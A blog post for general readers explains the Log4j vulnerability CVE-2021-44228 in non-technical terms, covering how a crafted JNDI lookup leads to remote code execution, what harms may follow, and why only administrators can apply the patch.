By now, you’ve likely heard about CVE 2021-44228, aka the L4J vulnerability, that is currently wreaking havoc among multitudes of IT systems around the world. Even if you don’t know exactly what L4J is, you at-least understand from all of the news headlines that it is an extremely dangerous exploit with a maximum severity ranking of 10. In fact, many in the info-sec community, including Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), considers this the most dangerous exploit of her decades long career, and rightly so. This attack has the potential to exceed the damage caused by rival exploit Apache Struts(remember the Equifax Breach?) or the SolarWinds supply-chain hack.
Still with all the hoopla, you may be asking yourself, how does this really impact me? Well, to understand that, let’s first start by explaining exactly what is L4J. It all begins with Java. Java is a very popular coding language that is used to develop many of the applications and systems we use today (i.e., social media, gaming, banking, etc.). L4J is an open source Java utility called a logging library. It is written in Java and is almost ALWAYS used in Java programming. The L4J logging library logs application events such as system error messages, or whenever a user enters data into a text field. Those logged events are then stored in a folder on the server. This may sound like a fairly mundane and routine practice, right? Well what makes this function exceptional is that the L4J can actually log expressions and perform network lookups for certain types of expressions. One of these expressions is the JNDI or the Java Naming and Directory Interface. Without going into a lot of technical details, the JNDI is a specially formatted string of characters (expression) that can include a URL to make calls out to and retrieve data from a URL specified in the expression. In its most simplistic terms, it means the L4J utility can be used to execute code that will connect to an external server, collect data from that external server and then store that data back on the original server. So, all a hacker needs to do is enter a JNDI expression that includes the URL of his/her malicious server into the “Search” field (or any text box for that matter) of an affected app instead of legitimate search criteria. The L4J utility will read and then execute the expression by making a call out to the malicious server’s URL, retrieve a nefarious payload from it and then store that payload on the victim’s server. That pay load can result in enabling what’s called remote code execution or RCE. The hacker now has access to the application’s server without ever having to enter a username and password.
So now let’s get back to how this will impact the average consumer. According to Java, over 3 Billion devices around the world use Java. With these numbers and the ease of use for this exploit, it’s proliferation WILL be astronomical. The harm that can be caused by this exploit is far reaching and can include (among other things):
◦ Distributed Denial of Service (DDOS)-Meaning no access to that favorite website for Christmas gifts
◦ Ransomware - Even worse, all the files are encrypted and no paychecks can be distributed to pay for Christmas gifts
◦ Exfiltration -Now someone has your info and will buy gifts on your dime
To make matters worse, there is absolutely NOTHING the average consumer can do to protect themselves from this exploit. While there is a fix (upgrading the L4J library to version 2.16 and above, or disabling L4J altogether), this is an action that can only be implemented by the application or systems administrator. The upgrade can also be more complex than most other software upgrades. Administrators not only have to determine whether their apps are utilizing L4J but they have to determine whether the system's third-party resources, backend services or other libraries are using the L4J library. L4J is quite ubiquitous and even though a fix exists getting a handle on this exploit before hackers are able to do a sizable amount of damage for some enterprises will be a major feat if at all possible. While worrying about the this vulnerability won't change much, a whole lot of patience and kindness towards your IT/Security team during this time could go a long way.